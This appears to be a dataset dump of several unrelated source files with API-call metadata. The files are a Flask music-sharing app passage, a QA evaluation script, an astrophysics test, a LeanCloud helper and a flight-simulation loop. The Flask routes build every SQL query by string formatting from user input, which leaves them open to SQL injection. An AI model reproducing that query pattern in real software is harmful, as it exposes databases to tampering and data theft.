Request_to="%s" """ % (-1,userfrom,userto)) g.database.execute(query) g.conn.commit() return redirect(url_for('userProfile', userid=userto)) def requestvalidate(userfrom,userto): check = g.database.execute(""" SELECT Status from requests where Request_to="%s" and Request_from="%s" """ % (userfrom,userto)) if check and g.database.fetchone()[0]=='-1' and userfrom!=userto: return False else: return True @app.route('/search',methods=['POST','GET']) def search(): if request.method == 'POST': searchform = searchForm(prefix='form6') #print 'f' value = searchform.entry.data + '%' search_fname = [] search_song= [] search_friend = [] search_playlist =[] search_artist = [] check_song = g.database.execute("""SELECT Song_title,Song_Album,Genre,Publisher,Song_id from MuShMe.songs WHERE Song_title LIKE "%s" """ % ( value )) for a in g.database.fetchall(): data={} data['title']=a[0] data['album']=a[1] data['genre']=a[2] data['publisher']=a[3] data['songid']=a[4] data['art']=getSongArt(a[4]) search_song.append(data) check_artist = g.database.execute("""SELECT Artist_name, Artist_id from MuShMe.artists WHERE Artist_name LIKE "%s" """ % ( value )) for a in g.database.fetchall(): data = {} data['artistname']=a[0] data['artistid']=a[1] search_artist.append(data) check_friend = g.database.execute("""SELECT Username, Name, Profile_pic, User_id from MuShMe.entries WHERE Username LIKE "%s" or Name LIKE "%s" """ % ( value, value )) for a in g.database.fetchall(): data = {} data['username']=a[0] data['name']=a[1] data['profilepic']=a[2] data['userid']=a[3] search_friend.append(data) check_playlist = g.database.execute("""SELECT Playlist_name,User_id, Playlist_id from MuShMe.playlists WHERE Playlist_name LIKE "%s" """ % ( value )) for a in g.database.fetchall(): data = {} data['pname']=a[0] data['pid']=a[2] g.database.execute(""" SELECT Username, Name from MuShMe.entries WHERE User_id="%s" """ % a[1]) for k in g.database.fetchall(): data['username']=k[0] data['uname']=k[1] search_playlist.append(data) length = len(search_playlist) + len(search_song) + len(search_friend) + len(search_artist) + len(search_fname) return render_template('searchpage/search.html', entry=searchform.entry.data,form6=searchForm(prefix='form6'), search_song=search_song, search_artist=search_artist,friends=search_friend, search_playlist=search_playlist,length = length) else: return render_template('searchpage/search.html',form6=searchForm(prefix='form6')) @app.route('/user/<userid>/addplaylist',methods=['POST']) def addplaylist(userid): if request.method=='POST': addplaylistform = AddPlaylist(prefix='form7') g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (addplaylistform.add.data,userid)) g.conn.commit() return redirect(url_for('userProfile',userid=userid)) @app.route("/playlist/<userid>/deleteplaylist", methods=["POST"]) def deleteplaylist(userid): playlist = request.form.getlist('playlistselect') for playlistid in playlist: g.database.execute("""DELETE FROM playlists WHERE Playlist_id=%s and User_id=%s """ % (playlistid, userid)) g.conn.commit() return redirect(url_for('userProfile',userid=userid)) #All your profile are belong to us. @app.route('/artist/<artistid>') def artistProfile(artistid): return render_template('artistpage/index.html',form6=searchForm(prefix='form6')) #To handle 404 not found errors @app.errorhandler(404) def page_not_found_error(error): return render_template('error.html'), 404 @app.route('/termsofservices') def tos(): return render_template('tos.html') @app.route('/about') def about(): return render_template('about.html') @app.route('/changepwd') def changepwd(): return render_template('changepwd.html') @app.route('/logout') def logout(): if 'email' not in session: return render_template('error.html') session['logged_in']=False return render_template('login.html') if not app.debug: import logging from logging.handlers import SMTPHandler mail_handler = SMTPHandler('127.0.0.1', '[email protected]', app.config['DEFAULT_MAIL_SENDER'], 'YourApplication Failed') mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) from logging import FileHandler file_handler = FileHandler('log.txt') file_handler.setLevel(logging.WARNING) app.logger.addHandler(file_handler) from logging import Formatter mail_handler.setFormatter(Formatter(''' Message type: %(levelname)s Location: %(pathname)s:%(lineno)d Module: %(module)s Function: %(funcName)s Time: %(asctime)s Message: %(message)s ''')) if __name__ == """__main__""": # To allow aptana to receive errors, set use_debugger=False app = create_app(config="""config.yaml""") if app.debug: use_debugger = True try: # Disable Flask's debugger if external debugger is requested use_debugger = not(app.config.get('DEBUG_WITH_APTANA')) except: pass app.run(use_debugger=use_debugger, use_reloader=use_debugger, threaded=True, port=8080)
[]
Xtuden-com/language
language/labs/drkit/evaluate.py
70c0328968d5ffa1201c6fdecde45bbc4fec19fc
# coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Evaluate lazy slot filling results.""" import codecs import collections import gzip import json import random import re import string import unicodedata from absl import app from absl import flags from bert import tokenization from language.labs.drkit import input_fns import numpy as np import tensorflow.compat.v1 as tf PUNCTUATION = frozenset(string.punctuation) FLAGS = flags.FLAGS ## Required parameters flags.DEFINE_string("ground_truth_file", None, "File with ground truth answers.") flags.DEFINE_string("predicted_answers_file", None, "File with predicted answers from model.") flags.DEFINE_string("relation_counts_file", None, "JSON file with relation counts.") class NumpyEncoder(json.JSONEncoder): """Special json encoder for numpy types.""" def default(self, obj): if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32, np.int64, np.uint8, np.uint16, np.uint32, np.uint64)): return int(obj) elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)): return float(obj) elif isinstance(obj, (np.ndarray,)): # This is the fix return obj.tolist() return json.JSONEncoder.default(self, obj) def wikimovie_eval_fn(dataset, results, name_map, output_prediction_file, **kwargs): """Compute evaluation metrics for OneHopDataset or TwoHopDataset. Args: dataset: An object of type OneHopDataset. results: A list of result dicts from running estimator.predict. name_map: A mapping from prediction indices to text strings. output_prediction_file: File to store predictions to. **kwargs: Variable keyword arguments. Returns: metrics: A dict mapping metric names to values. """ del kwargs # Collect ground truth answers. gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples} gt_ques = {ex.qas_id: ex.question_text for ex in dataset.examples} gt_entity = {ex.qas_id: ex.subject_entity[0] for ex in dataset.examples} inf_chain = {ex.qas_id: ex.inference_chain for ex in dataset.examples} # Compute basic metrics. num_correct = 0. all_predictions = {} chain2stats = {ch: [0., 0.] for ch in inf_chain.values()} incorrect_results, correct_results = [], [] for result in results: qas_id = result["qas_ids"] prediction = result["predictions"] if prediction in gt_answer[qas_id]: num_correct += 1 chain2stats[inf_chain[qas_id]][0] += 1 correct_results.append({ "qas_id": result["qas_ids"], "question": gt_ques[qas_id], "answers": gt_answer[qas_id], "subject": gt_entity[qas_id], "inf-chain": inf_chain[qas_id], "predictions": result["predictions"], }) for hop in range(3): if "sparse_%d" % hop in result: correct_results[-1].update({ "sparse_%d" % hop: result["sparse_%d" % hop], "dense_%d" % hop: result["dense_%d" % hop], "mention_%d" % hop: result["mention_%d" % hop], "entity_%d" % hop: result["entity_%d" % hop], "sparse_scores_%d" % hop: result["sparse_scores_%d" % hop], "dense_scores_%d" % hop: result["dense_scores_%d" % hop], "mention_scores_%d" % hop: result["mention_scores_%d" % hop], "entity_scores_%d" % hop: result["entity_scores_%d" % hop], }) else: incorrect_results.append({ "qas_id": result["qas_ids"], "question": gt_ques[qas_id], "answers": gt_answer[qas_id], "subject": gt_entity[qas_id], "inf-chain": inf_chain[qas_id], "predictions": result["predictions"], }) for hop in range(3): if "sparse_%d" % hop in result: incorrect_results[-1].update({ "sparse_%d" % hop: result["sparse_%d" % hop], "dense_%d" % hop: result["dense_%d" % hop], "mention_%d" % hop: result["mention_%d" % hop], "entity_%d" % hop: result["entity_%d" % hop], "sparse_scores_%d" % hop: result["sparse_scores_%d" % hop], "dense_scores_%d" % hop: result["dense_scores_%d" % hop], "mention_scores_%d" % hop: result["mention_scores_%d" % hop], "entity_scores_%d" % hop: result["entity_scores_%d" % hop], }) chain2stats[inf_chain[qas_id]][1] += 1 all_predictions[qas_id] = name_map[str(prediction)] accuracy = num_correct / len(all_predictions) json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w")) json.dump( random.sample(incorrect_results, 100), tf.gfile.Open(output_prediction_file + ".incorrect", "w"), cls=NumpyEncoder) json.dump( random.sample(correct_results, 100), tf.gfile.Open(output_prediction_file + ".correct", "w"), cls=NumpyEncoder) # Return metrics. metrics = { "accuracy": accuracy, } for ch, stats in chain2stats.items(): metrics["inference-chains-acc/" + ch] = stats[0] / stats[1] return metrics def multihop_eval_fn(dataset, results, name_map, output_prediction_file, supervision="mention", **kwargs): """Compute evaluation metrics for OneHopDataset or TwoHopDataset. Args: dataset: An object of type OneHopDataset. results: A list of result dicts from running estimator.predict. name_map: A mapping from prediction indices to text strings. output_prediction_file: File to store predictions to. supervision: Type of supervision used in the model. **kwargs: Variable keyword arguments. Returns: metrics: A dict mapping metric names to values. """ del kwargs # Collect ground truth answers. gt_mentions = {ex.qas_id: ex.answer_mention[0] for ex in dataset.examples} if supervision == "mention": gt_answer = gt_mentions else: gt_answer = {ex.qas_id: ex.answer_entity[0] for ex in dataset.examples} # Compute basic metrics. num_correct = 0. all_predictions = {} for result in results: qas_id = result["qas_ids"] prediction = result["predictions"] if prediction == gt_answer[qas_id]: num_correct += 1 all_predictions[qas_id] = name_map[str(prediction)] accuracy = num_correct / len(all_predictions) # Compute advanced metrics. json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w")) micro, macro, _, _ = compute_scores(dataset.gt_file, output_prediction_file) # Return metrics. metrics = { "accuracy": accuracy, "micro-p": micro[0], "micro-r": micro[1], "micro-f": micro[2], "macro-p": macro[0], "macro-r": macro[1], "macro-f": macro[2], } return metrics def hotpot_eval_fn(dataset, results, name_map, output_prediction_file, **kwargs): """Compute evaluation metrics for HotpotQADataset. Args: dataset: An object of type HotpotQADataset. results: A list of result dicts from running estimator.predict. name_map: A mapping from prediction indices to text strings. output_prediction_file: File to store predictions to. **kwargs: Variable keyword arguments. Returns: metrics: A dict mapping metric names to values. """ del kwargs # Collect ground truth answers. gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples} gt_types = {ex.qas_id: ex.inference_chain for ex in dataset.examples} # Compute basic metrics. num_correct = {2: 0., 5: 0., 10: 0., 20: 0.} aps = [] no_answer = 0. all_predictions = {} bridge_acc, comp_acc = 0., 0. bridge_tot, comp_tot = 0, 0 single_acc = 0. layer_weights = np.zeros_like(results[0]["layer_probs"]) num_layer_entities = {i: 0. for i in range(layer_weights.shape[0])} num_new_entities = {i: 0. for i in range(layer_weights.shape[0])} for result in results: qas_id = result["qas_ids"].decode("utf-8") preds = result["top_idx"] scores = result["top_vals"] ans = gt_answer[qas_id] my_type = gt_types[qas_id] if my_type == "bridge": bridge_tot += 1 else: comp_tot += 1 ranks = np.where(np.in1d(preds, ans))[0] ranks = np.sort(ranks) ap = 0. cnt = 0. if any(rr < 10 for rr in ranks): single_acc += 1 if ranks.shape[0] == 0: no_answer += 1 for rr in ranks: cnt += 1 ap += cnt / (rr + 1) if ans: aps.append(ap / len(ans)) else: aps.append(0.) found = False for key in [2, 5, 10, 20]: if found or np.in1d(ans, preds[:key]).all(): num_correct[key] += 1 found = True if key == 10: if my_type == "bridge": bridge_acc += 1 else: comp_acc += 1 # Non-accuracy stats layer_weights += result["layer_probs"] layer_entities = {i: set() for i in range(layer_weights.shape[0])} all_predictions[qas_id] = {} for i in range(layer_weights.shape[0]): layer_entities[i] = set( [ee for ee in result["layer_%d_ent" % i] if ee != -1]) num_layer_entities[i] += len(layer_entities[i]) num_new_entities[i] += len(layer_entities[i] - layer_entities[0]) # all_predictions[qas_id]["layer_%d" % i] = [ # name_map[str(ee)] for ee in layer_entities[i]] all_predictions[qas_id]["predictions"] = [ (name_map[str(pred)], str(scores[i])) for i, pred in enumerate(preds) ] tf.logging.info("Evaluated %d items", len(all_predictions)) accuracy = { key: (num_correct[key] / len(all_predictions)) for key in num_correct } # Compute advanced metrics. json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w")) # Return metrics. metrics = {"eval/@%d" % key: accuracy[key] for key in accuracy} metrics["accuracy"] = accuracy[10] metrics["eval/map"] = sum(aps) / len(all_predictions) metrics["eval/bridge_accuracy"] = bridge_acc / bridge_tot metrics["eval/comparison_accuracy"] = comp_acc / comp_tot metrics["analysis/single_accuracy"] = single_acc / len(all_predictions) metrics["analysis/no_answers"] = no_answer / len(all_predictions) for i in range(layer_weights.shape[0]): metrics["analysis/layer_weight_%d" % i] = layer_weights[i] / len(all_predictions) metrics["analysis/num_entities_%d" % i] = num_layer_entities[i] / len(all_predictions) metrics["analysis/num_new_entities_%d" % i] = num_new_entities[i] / len(all_predictions) return metrics def normalize_answer(s): """Lower text and remove punctuation, articles and extra whitespace.""" def remove_articles(text): return re.sub(r"\b(a|an|the)\b", " ", text) def white_space_fix(text): return " ".join(text.split()) def remove_punc(text): exclude = set(string.punctuation) return "".join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_articles(remove_punc(lower(s)))) def f1_score(prediction, ground_truth): """Compute F1 score.""" prediction_tokens = normalize_answer(prediction).split() ground_truth_tokens = normalize_answer(ground_truth).split() common = collections.Counter(prediction_tokens) & collections.Counter( ground_truth_tokens) num_same = sum(common.values()) if num_same == 0: return 0 precision = 1.0 * num_same / len(prediction_tokens) recall = 1.0 * num_same / len(ground_truth_tokens) f1 = (2 * precision * recall) / (precision + recall) return f1 def exact_match_score(prediction, ground_truth): """Compute EM score.""" return normalize_answer(prediction) == normalize_answer(ground_truth) def metric_max_over_ground_truths(metric_fn, prediction, ground_truths): scores_for_ground_truths = [] for ground_truth in ground_truths: my_score = metric_fn(prediction, ground_truth) scores_for_ground_truths.append(my_score) return max(scores_for_ground_truths) def read_predictions(prediction_file): with tf.gfile.Open(prediction_file) as f: predictions = json.load(f) return predictions def read_answers(gold_file): """Read ground truth answers.""" answers = {} f = tf.gfile.Open(gold_file) if gold_file.endswith(".gz"): f = gzip.GzipFile(fileobj=f) for i, line in enumerate(f): example = json.loads(line) if i == 0 and "header" in example: continue for qa in example["qas"]: answers[qa["qid"]] = qa["answers"] f.close() return answers def evaluate(answers, predictions, skip_no_answer=False): """Compute F1 and EM scores.""" f1 = exact_match = total = 0 for qid, ground_truths in answers.items(): if qid not in predictions: if not skip_no_answer: message = "Unanswered question %s will receive score 0." % qid print(message) total += 1 continue total += 1 prediction = predictions[qid] exact_match += metric_max_over_ground_truths(exact_match_score, prediction, ground_truths) f1 += metric_max_over_ground_truths(f1_score, prediction, ground_truths) exact_match = 100.0 * exact_match / total f1 = 100.0 * f1 / total return {"exact_match": exact_match, "f1": f1} def mrqa_eval_fn(dataset_file, predictions_file, skip_no_answer=True): answers = read_answers(dataset_file) predictions = read_predictions(predictions_file) return evaluate(answers, predictions, skip_no_answer) def compute_scores(ground_truth_file, predicted_answers_file): """Read predictions and ground truth and return P, R, F.""" telemetry, incorrect = read_results(ground_truth_file, predicted_answers_file) micro = aprf(telemetry) relationwise = aprf_relationwise(telemetry) macro = sum([val[0] for _, val in relationwise.items()]) macro = macro / len(relationwise) return micro, macro, relationwise, incorrect def read_results(ground_truth_file, predicted_answers_file): """Read results and ground truth and return data structure with stats.""" with codecs.getreader("utf-8")(tf.gfile.GFile(ground_truth_file, "r")) as read: data_ = {} for line in read: item = json.loads(line.strip()) if isinstance(item["relation"], dict): relation = item["relation"]["wikidata_id"] elif isinstance(item["relation"], list): relation = ( item["relation"][0]["wikidata_id"] + "_" + item["relation"][1]["wikidata_id"]) data_[item["id"]] = [relation, item["subject"]["wikidata_id"]] if "is_impossible" in item and item["is_impossible"]: continue if item["object"] is None: continue if isinstance(item["object"]["mention"], dict): data_[item["id"]] += [item["object"]["mention"]["text"]] if "name" in item["object"]: data_[item["id"]] += [item["object"]["name"]] if "aliases" in item["object"]: data_[item["id"]] += item["object"]["aliases"].keys() with codecs.getreader("utf-8")(tf.gfile.GFile(predicted_answers_file, "r")) as fin: predictions = json.load(fin) telemetry, incorrect = [], [] n = 0 for key in data_: if key not in predictions: continue g = data_[key][2:] a = predictions[key] m = data_[key][:2] stats = score(g, a) telemetry.append([m[0], m[1], g, a, stats]) if stats[0] == 0. and stats[3] > 0.: incorrect.append(key) n += 1 return telemetry, incorrect def aprf_relationwise(g): """Returns precision, recall and F score for each relation.""" rel_to_stats = collections.defaultdict(list) for item in g: rel_to_stats[item[0]].append(item) rel_to_scores = {} for rel, stats in rel_to_stats.items(): rel_to_scores[rel] = [aprf(stats), len(stats)] return rel_to_scores def aprf(g): """Returns precision, recall and F of the given statistics.""" tp, _, sys_pos, real_pos = sum([x[-1] for x in g]) if tp == 0: p = r = f = 0.0 else: p = tp / float(sys_pos) if sys_pos > 0 else 0. r = tp / float(real_pos) if real_pos > 0 else 0. f = 2 * p * r / (p + r) return np.asarray([p, r, f]) def score(gold, answer): """Compares answer to ground truth to return TP / FP stats.""" if gold: gold = set([simplify(g) for g in gold]) answer = simplify(answer) result = np.zeros(4) if gold: result[3] += 1 if answer in gold: result[0] += 1 else: if not answer: result[1] += 1 if answer: result[2] += 1 return result def strip_accents_and_punct(text): """Strips accents from a piece of text.""" text = unicodedata.normalize("NFD", text) output = [] for char in text: if char in PUNCTUATION: continue cat = unicodedata.category(char) if cat == "Mn": continue output.append(char) return "".join(output) def simplify(answer): """Pre-process answer string.""" toks = [] articles = {"the", "a", "an", "and", ""} for t in answer.strip().lower().split(): tok = strip_accents_and_punct(t) if tok not in articles: toks.append(tok) return "".join(toks) def rare_relation_scores(relationwise, relation2counts): """Print statistics of rare relations for different thresholds.""" for thresh in [5, 100, 500, 1000]: freq_stats, freq_total = np.array([0., 0., 0.]), 0 rare_stats, rare_total = np.array([0., 0., 0.]), 0 for relation, (stats, _) in relationwise.items(): if relation2counts.get(relation, 0) < thresh: rare_stats += stats rare_total += 1 else: freq_stats += stats freq_total += 1 rare_stats /= rare_total freq_stats /= freq_total print( "Threshold =", thresh, "rare", rare_total, "Micro-P %.3f Micro-R %.3f Micro-F %.3f" % (rare_stats[0], rare_stats[1], rare_stats[2]), "freq", freq_total, "Micro-P %.3f Micro-R %.3f Micro-F %.3f" % (freq_stats[0], freq_stats[1], freq_stats[2])) def main(_): eval_type = "hotpot" if eval_type == "hotpot": test_hotpot_eval() else: micro, macro, rwise, _ = compute_scores(FLAGS.ground_truth_file, FLAGS.predicted_answers_file) print("Micro", micro) print("Macro", macro) if FLAGS.relation_counts_file is not None: r2c = json.load(tf.gfile.Open(FLAGS.relation_counts_file)) rare_relation_scores(rwise, r2c) if __name__ == "__main__": app.run(main)
[((1051, 1136), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""ground_truth_file"""', 'None', '"""File with ground truth answers."""'], {}), "('ground_truth_file', None,\n 'File with ground truth answers.')\n", (1070, 1136), False, 'from absl import flags\n'), ((1154, 1252), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""predicted_answers_file"""', 'None', '"""File with predicted answers from model."""'], {}), "('predicted_answers_file', None,\n 'File with predicted answers from model.')\n", (1173, 1252), False, 'from absl import flags\n'), ((1270, 1358), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""relation_counts_file"""', 'None', '"""JSON file with relation counts."""'], {}), "('relation_counts_file', None,\n 'JSON file with relation counts.')\n", (1289, 1358), False, 'from absl import flags\n'), ((8405, 8445), 'numpy.zeros_like', 'np.zeros_like', (["results[0]['layer_probs']"], {}), "(results[0]['layer_probs'])\n", (8418, 8445), True, 'import numpy as np\n'), ((12886, 12910), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['gold_file'], {}), '(gold_file)\n', (12899, 12910), True, 'import tensorflow.compat.v1 as tf\n'), ((16361, 16390), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (16384, 16390), False, 'import collections\n'), ((16900, 16921), 'numpy.asarray', 'np.asarray', (['[p, r, f]'], {}), '([p, r, f])\n', (16910, 16921), True, 'import numpy as np\n'), ((17108, 17119), 'numpy.zeros', 'np.zeros', (['(4)'], {}), '(4)\n', (17116, 17119), True, 'import numpy as np\n'), ((17381, 17415), 'unicodedata.normalize', 'unicodedata.normalize', (['"""NFD"""', 'text'], {}), "('NFD', text)\n", (17402, 17415), False, 'import unicodedata\n'), ((19207, 19220), 'absl.app.run', 'app.run', (['main'], {}), '(main)\n', (19214, 19220), False, 'from absl import app\n'), ((1865, 1900), 'json.JSONEncoder.default', 'json.JSONEncoder.default', (['self', 'obj'], {}), '(self, obj)\n', (1889, 1900), False, 'import json\n'), ((5227, 5269), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['output_prediction_file', '"""w"""'], {}), "(output_prediction_file, 'w')\n", (5240, 5269), True, 'import tensorflow.compat.v1 as tf\n'), ((5290, 5327), 'random.sample', 'random.sample', (['incorrect_results', '(100)'], {}), '(incorrect_results, 100)\n', (5303, 5327), False, 'import random\n'), ((5335, 5392), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (["(output_prediction_file + '.incorrect')", '"""w"""'], {}), "(output_prediction_file + '.incorrect', 'w')\n", (5348, 5392), True, 'import tensorflow.compat.v1 as tf\n'), ((5437, 5472), 'random.sample', 'random.sample', (['correct_results', '(100)'], {}), '(correct_results, 100)\n', (5450, 5472), False, 'import random\n'), ((5480, 5535), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (["(output_prediction_file + '.correct')", '"""w"""'], {}), "(output_prediction_file + '.correct', 'w')\n", (5493, 5535), True, 'import tensorflow.compat.v1 as tf\n'), ((7105, 7147), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['output_prediction_file', '"""w"""'], {}), "(output_prediction_file, 'w')\n", (7118, 7147), True, 'import tensorflow.compat.v1 as tf\n'), ((8914, 8928), 'numpy.sort', 'np.sort', (['ranks'], {}), '(ranks)\n', (8921, 8928), True, 'import numpy as np\n'), ((10374, 10416), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['output_prediction_file', '"""w"""'], {}), "(output_prediction_file, 'w')\n", (10387, 10416), True, 'import tensorflow.compat.v1 as tf\n'), ((11368, 11405), 're.sub', 're.sub', (['"""\\\\b(a|an|the)\\\\b"""', '""" """', 'text'], {}), "('\\\\b(a|an|the)\\\\b', ' ', text)\n", (11374, 11405), False, 'import re\n'), ((11903, 11941), 'collections.Counter', 'collections.Counter', (['prediction_tokens'], {}), '(prediction_tokens)\n', (11922, 11941), False, 'import collections\n'), ((11944, 11984), 'collections.Counter', 'collections.Counter', (['ground_truth_tokens'], {}), '(ground_truth_tokens)\n', (11963, 11984), False, 'import collections\n'), ((12710, 12740), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['prediction_file'], {}), '(prediction_file)\n', (12723, 12740), True, 'import tensorflow.compat.v1 as tf\n'), ((12765, 12777), 'json.load', 'json.load', (['f'], {}), '(f)\n', (12774, 12777), False, 'import json\n'), ((12951, 12975), 'gzip.GzipFile', 'gzip.GzipFile', ([], {'fileobj': 'f'}), '(fileobj=f)\n', (12964, 12975), False, 'import gzip\n'), ((13021, 13037), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (13031, 13037), False, 'import json\n'), ((15848, 15862), 'json.load', 'json.load', (['fin'], {}), '(fin)\n', (15857, 15862), False, 'import json\n'), ((17503, 17529), 'unicodedata.category', 'unicodedata.category', (['char'], {}), '(char)\n', (17523, 17529), False, 'import unicodedata\n'), ((14727, 14752), 'codecs.getreader', 'codecs.getreader', (['"""utf-8"""'], {}), "('utf-8')\n", (14743, 14752), False, 'import codecs\n'), ((14753, 14791), 'tensorflow.compat.v1.gfile.GFile', 'tf.gfile.GFile', (['ground_truth_file', '"""r"""'], {}), "(ground_truth_file, 'r')\n", (14767, 14791), True, 'import tensorflow.compat.v1 as tf\n'), ((15703, 15728), 'codecs.getreader', 'codecs.getreader', (['"""utf-8"""'], {}), "('utf-8')\n", (15719, 15728), False, 'import codecs\n'), ((15729, 15772), 'tensorflow.compat.v1.gfile.GFile', 'tf.gfile.GFile', (['predicted_answers_file', '"""r"""'], {}), "(predicted_answers_file, 'r')\n", (15743, 15772), True, 'import tensorflow.compat.v1 as tf\n'), ((18076, 18101), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (18084, 18101), True, 'import numpy as np\n'), ((18131, 18156), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (18139, 18156), True, 'import numpy as np\n'), ((8878, 8897), 'numpy.in1d', 'np.in1d', (['preds', 'ans'], {}), '(preds, ans)\n', (8885, 8897), True, 'import numpy as np\n'), ((19094, 19135), 'tensorflow.compat.v1.gfile.Open', 'tf.gfile.Open', (['FLAGS.relation_counts_file'], {}), '(FLAGS.relation_counts_file)\n', (19107, 19135), True, 'import tensorflow.compat.v1 as tf\n'), ((9267, 9292), 'numpy.in1d', 'np.in1d', (['ans', 'preds[:key]'], {}), '(ans, preds[:key])\n', (9274, 9292), True, 'import numpy as np\n')]
jlashner/ares
tests/adv/test_pop_sfrd.py
6df2b676ded6bd59082a531641cb1dadd475c8a8
""" test_pop_models.py Author: Jordan Mirocha Affiliation: UCLA Created on: Fri Jul 15 15:23:11 PDT 2016 Description: """ import ares import matplotlib.pyplot as pl PB = ares.util.ParameterBundle def test(): # Create a simple population pars_1 = PB('pop:fcoll') + PB('sed:bpass') pop_fcoll = ares.populations.GalaxyPopulation(**pars_1) #pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1) # Mimic the above population to check our different SFRD/SED techniques sfrd_pars = {'pop_sfr_model': 'sfrd-func'} sfrd_pars['pop_sfrd'] = pop_fcoll.SFRD sfrd_pars['pop_sfrd_units'] = 'internal' sed = PB('sed:toy') sed['pop_Nion'] = pop_fcoll.src.Nion sed['pop_Nlw'] = pop_fcoll.src.Nlw # pop_Ex? sed['pop_ion_src_igm'] = False sed['pop_heat_src_igm'] = False pars_2 = sed + sfrd_pars pop_sfrd = ares.populations.GalaxyPopulation(**pars_2) assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD." # Check the emissivities too #print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6)) #print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6)) #assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \ # == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \ # "Error in photon luminosity density." if __name__ == '__main__': test()
[((313, 356), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_1)\n', (346, 356), False, 'import ares\n'), ((885, 928), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_2)\n', (918, 928), False, 'import ares\n')]
corgiclub/CorgiBot_telegram
venv/lib/python3.7/site-packages/leancloud/engine/utils.py
a63d91a74ee497b9a405e93bd3b303367ef95268
# coding: utf-8 import time import hashlib import leancloud from leancloud._compat import to_bytes __author__ = 'asaka <[email protected]>' def sign_by_key(timestamp, key): return hashlib.md5(to_bytes('{0}{1}'.format(timestamp, key))).hexdigest()
[]
eyler94/ee674AirplaneSim
AirplaneLQR/chap4LQR/mavsim_chap4.py
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
""" mavsimPy - Chapter 4 assignment for Beard & McLain, PUP, 2012 - Update history: 12/27/2018 - RWB 1/17/2019 - RWB """ import sys sys.path.append('..') import numpy as np import parameters.simulation_parameters as SIM from chap2.mav_viewer import mav_viewer # from chap2.video_writer import video_writer from chap3.data_viewer import data_viewer from chap4.mav_dynamics import mav_dynamics from chap4.wind_simulation import wind_simulation from time import sleep # initialize the visualization VIDEO = False # True==write video, False==don't write video mav_view = mav_viewer() # initialize the mav viewer data_view = data_viewer() # initialize view of data plots if VIDEO == True: video = video_writer(video_name="chap4_video.avi", bounding_box=(0, 0, 1000, 1000), output_rate=SIM.ts_video) # initialize elements of the architecture wind = wind_simulation(SIM.ts_simulation) mav = mav_dynamics(SIM.ts_simulation) # initialize the simulation time sim_time = SIM.start_time # main simulation loop # sleep(5) print("Press Command-Q to exit...") while sim_time < SIM.end_time: #-------set control surfaces------------- if(sim_time<25): delta_e = -0.1 delta_t = 1.0 # 0.5 delta_a = 0.0 # 0.0 delta_r = 0.0 # 0.005 delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector else: delta_e = -0.3 delta_t = 1.0#0.5 delta_a = 0.01#0.0 delta_r = 0.00025#0.005 delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector #-------physical system------------- current_wind = wind.update() # get the new wind vector # print("current wind: ", current_wind) mav.update_state(delta, current_wind) # propagate the MAV dynamics #-------update viewer------------- mav_view.update(mav.msg_true_state) # plot body of MAV data_view.update(mav.msg_true_state, # true states mav.msg_true_state, # estimated states mav.msg_true_state, # commanded states SIM.ts_simulation) if VIDEO == True: video.update(sim_time) #-------increment time------------- sim_time += SIM.ts_simulation if VIDEO == True: video.close()
